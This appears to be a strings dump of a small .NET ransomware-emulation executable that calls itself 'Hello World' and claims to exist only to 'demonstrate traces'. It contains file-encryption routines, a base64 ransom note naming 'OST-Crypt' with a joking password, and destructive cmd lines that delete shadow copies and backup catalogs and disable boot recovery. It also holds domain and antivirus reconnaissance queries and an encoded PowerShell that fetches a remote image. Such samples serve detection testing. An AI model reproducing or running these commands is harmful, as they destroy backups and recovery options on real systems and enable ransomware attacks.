!This program cannot be run in DOS mode.
`.sdata
@.reloc
v4.0.30319
#Strings
<Module>
HelloWorld
CoreEncryption
CoreDecryption
EncryptionFile
DecryptionFile
bytesToBeEncrypted
passwordBytes
System
<PrivateImplementationDetails>
$ArrayType=8
$field-DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
RuntimeHelpers
System.Runtime.CompilerServices
InitializeArray
RuntimeFieldHandle
MemoryStream
System.IO
RijndaelManaged
System.Security.Cryptography
SymmetricAlgorithm
set_KeySize
set_BlockSize
Rfc2898DeriveBytes
get_KeySize
DeriveBytes
GetBytes
set_Key
get_BlockSize
set_IV
set_Mode
CipherMode
CryptoStream
CreateEncryptor
ICryptoTransform
Stream
CryptoStreamMode
IDisposable
Dispose
ToArray
Object
bytesToBeDecrypted
CreateDecryptor
password
ReadAllBytes
Encoding
System.Text
get_UTF8
SHA256
Create
HashAlgorithm
ComputeHash
WriteAllBytes
fileEncrypted
Console
WriteLine
String
op_Equality
OSPlatform
System.Runtime.InteropServices
get_Linux
RuntimeInformation
IsOSPlatform
Thread
System.Threading
Process
System.Diagnostics
Convert
FromBase64String
GetString
WriteAllText
decrypt
Directory
GetFiles
SearchOption
EndsWith
Concat
get_Length
Substring
CompilerGeneratedAttribute
AES_Encrypt
AES_Decrypt
EncryptFile
DecryptFile
ValueType
RuntimeCompatibilityAttribute
mscorlib
hello.exe
WrapNonExceptionThrows
_CorExeMain
mscoree.dll
Hello World!
-decrypt
@ Anyone who thinks they need to analyze this file: it is just to demonstrate traces
cmd.exe
/c vssadmin Delete Shadows /All /Quiet
/c cdedit.exe /set {{default}} bootstatuspolicy ignoreallfailures & bcdedit /set {{default}} recoveryenabled no
/c wbadmin.exe delete catalog -quiet
/c wmic shadowcopy delete
/c whoami
/c wmic USERACCOUNT Get Domain,Name,Sid
/c wmic NTDOMAIN GET DomainControllerAddress,DomainName,Roles /VALUE
/c wmic /namespace:\\root\securitycenter2 path antivirusproduct
-exec bypass -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACIAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AaQB0AHAAcgBvAHQAbwBkAGEAeQAuAGMAbwBtAC8AcwBpAHQAZQBzAC8AaQB0AHAAcgBvAHQAbwBkAGEAeQAuAGMAbwBtAC8AZgBpAGwAZQBzAC8AcwB0AHkAbABlAHMALwBhAHIAdABpAGMAbABlAF8AZgBlAGEAdAB1AHIAZQBkAF8AcgBlAHQAaQBuAGEALwBwAHUAYgBsAGkAYwAvAHIAYQBuAHMAbwBtAHcAYQByAGUALQBhAHQAdABhAGMAawAuAGoAcABnAD8AaQB0AG8AawA9AFoAeAB2AHIAcgBfADQARgAiACAALQBPAHUAdABGAGkAbABlACAAIgByAGEAbgBzAG8AbQAuAGoAcABnACIAIAANAAoAIAAgACAAIABzAGUAdAAtAGkAdABlAG0AcAByAG8AcABlAHIAdAB5ACAALQBwAGEAdABoACAAIgBIAEsAQwBVADoAXABDAG8AbgB0AHIAbwBsACAAUABhAG4AZQBsAFwARABlAHMAawB0AG8AcAAiACAALQBuAGEAbQBlACAAVwBhAGwAbABQAGEAcABlAHIAIAAtAHYAYQBsAHUAZQAgAHIAYQBuAHMAbwBtAC4AagBwAGcADQAKACAAIAAgACAAIwBuAGUAZQBkAGUAZAAgAHQAbwAgAGEAYwB0AHUAYQBsAGwAeQAgAGMAaABhAG4AZwBlACAAdABoAGUAIABiAGEAYwBrAGcAcgBvAHUAbgBkACAAYwBvAG4AcwBpAHMAdABlAG4AdABsAHkAIAANAAoAIAAgACAAIABTAGwAZQBlAHAAIAAtAHMAZQBjAG8AbgBkAHMAIAA1AA0ACgAgACAAIAAgACAAUgBVAE4ARABMAEwAMwAyAC4ARQBYAEUAIABVAFMARQBSADMAMgAuA
PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PQpUaGlzIFBDIGhhcyBiZWVuIGluZmVjdGVkIGJ5IE9TVC1DcnlwdAo9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09CgpBbGwgeWVyIHByZWNpb3VzIGZpbGV6eiBhcmUgZ29uZSBub3cgOykKTm8gd29ycmllcyBmb3IganVzdCAzMDAkIHlvdSBjYW4gaGF2ZSB0aGVtIGJhY2suLi4KClRvIGRlY29kZSBjb250YWN0OiByYW5zb21Abm90ZXhpc3RhbnQudG8KCgo9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09Cj09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0KanVzdCBraWRkaW5nOiBwYXNzd29yZCBpcyAiYWJjZCIKcnVuIGJpbmFyeSB3aXRoOiAuL2hlbGxvLmV4ZSAtZGVjcnlwdCB0byBkZWNyeXB0
ransomnote.txt
File already encrypted
Glad you decided to do the right thing! Thanks for the money, here are your files:
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
007f04b0
Comments
CompanyName
FileDescription
FileVersion
0.0.0.0
InternalName
LegalCopyright
LegalTrademarks
OriginalFilename
hello.exe
ProductName
ProductVersion